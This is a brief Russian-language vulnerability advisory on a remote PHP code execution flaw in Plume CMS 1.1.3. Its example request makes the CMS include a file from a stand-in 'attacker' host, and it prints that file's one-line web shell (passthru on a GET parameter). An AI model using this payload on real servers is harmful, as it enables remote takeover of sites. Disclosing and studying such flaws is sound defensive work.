• Партнер

  • Программа: Plume CMS 1.1.3

    Уязвимость позволяет удаленному
    пользователю выполнить произвольный PHP код
    на целевой системе.

    Пример:

    http://localhost/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=
    ls-al&_PX_config[manager_path]=http://attacker/cmd.gif?

    cmd.gif
    <?
    passthru($_GET[cmd]);
    ?>

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии